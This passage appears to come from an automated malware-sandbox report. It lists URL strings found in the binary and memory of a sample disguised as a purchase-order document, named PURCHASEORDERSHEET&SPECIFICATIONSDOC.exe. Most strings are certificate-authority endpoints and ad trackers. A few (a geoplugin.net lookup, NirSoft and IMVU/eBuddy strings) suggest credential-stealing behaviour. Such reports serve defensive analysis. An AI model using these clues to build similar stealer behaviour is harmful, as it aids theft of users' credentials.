              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.geotrust.com/GeoTrustECCCA2018.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.thawte.com/ThawteRSACA2018.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cdp.geotrust.com/GeoTrustECCCA2018.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cdp.thawte.com/ThawteRSACA2018.crl0L
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://certificates.godaddy.com/repository/0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://certs.godaddy.com/repository/1301
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://contentstorage.osi.office.net/
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl.globalsign.com/gsgccr3dvtlsca2020.crl0#
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl.godaddy.com/gdig2s1-2558.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crl0H
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertSHA2SecureServerCA.crl0=
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0F
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0D
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0L
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0L
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0L
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0L
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crls.pki.goog/gts1c3/fVJxbV-Ktmk.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59075843834.0000000005DDB000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59075843834.0000000005DC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59075843834.0000000005DC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpn.net/
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, Gutte.exe.135.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, Gutte.exe.135.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://o.ss2.us/0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.digicert.com0B
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.digicert.com0F
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.digicert.com0G
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.digicert.com0K
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.digicert.com0M
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.digicert.com0O
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.digicert.com0Q
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.globalsign.com/ca/gsovsha2g4r30
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr3dvtlsca20200V
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.godaddy.com/0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.godaddy.com/02
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.godaddy.com/05
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.pki.goog/gsr10)
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.pki.goog/gts1c301
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.pki.goog/gtsr100
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp.sectigo.com0%
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocsp2.globalsign.com/rootr30;
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0$
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der07
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://s.ss2.us/r.crl0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr3dvtlsca2020.crt09
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://secure.globalsign.com/cacert/gsovsha2g4r3.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://status.geotrust.com0=
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://status.thawte.com09
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://trc.taboola.com/p3p.xml
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://www.digicert.com/CPS0u
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://www.digicert.com/CPS0v
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000002.56238940466.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000003.56238594128.0000000000B3D000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000003.56238516037.0000000000B3D000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000002.56238940466.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000002.56238855541.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/P
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000003.56238594128.0000000000B3D000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000003.56238516037.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000002.56238940466.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000002.56238940466.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56267131156.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000002.56238940466.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://x.ss2.us/x.cer0&
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.double
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doublecli
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activ
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activi
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258217273.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56262328116.000000000236A000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56260219146.000000000236D000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.000000000236D000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56262170536.000000000236A000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258217273.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://acdn.adnxs.com/ast/ast.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258217273.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258217273.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QUZE
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?daed76fa672ed2fa739774d44bb38da5
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?e77f8dc2c88b806ec91fb50956aeee97
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://api.taboola.com/1.2/json/taboola-usersync/user.sync?app.type=desktop&app.apikey=e60e3b54fc66
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC05934b07a40a4d8a9a0cc7a79e85434
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC9fc5c8b8bfb94ba5833ba8065b1de35
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCacc6c4ed30494f9fad065afe638a7ca
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/AAehR3S.svg
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://b1sync.zemanta.com/usersync/msn/?puid=101156F9176C6E98058F466E16B36FAC
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://btloader.com/tag?o=6208086025961472&upapi=true
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://capturemedia-assets.com/
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cdn.adnxs.com/v/s/215/trk.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/CommonDiagnostics.js?b=16521.30551
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.png?b=14512.30550
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.png?b=16521.30551
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-aad.png?b=14512.30550
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-msa.png?b=16521.30551
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/jquery-1.12.4.1.min.js?b=16521.30551
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/knockout-3.4.2.js?b=16521.30551
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cdn.taboola.com/TaboolaCookieSyncScript.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://certs.godaddy.com/repository/0
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://clientconfig.microsoftonline-p.net
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/avatar.png
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/bundle.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/fabric.min.css
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.med
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.medi
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://contextual.media.net/
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://contextual.media.net/48/nrrV39259.js
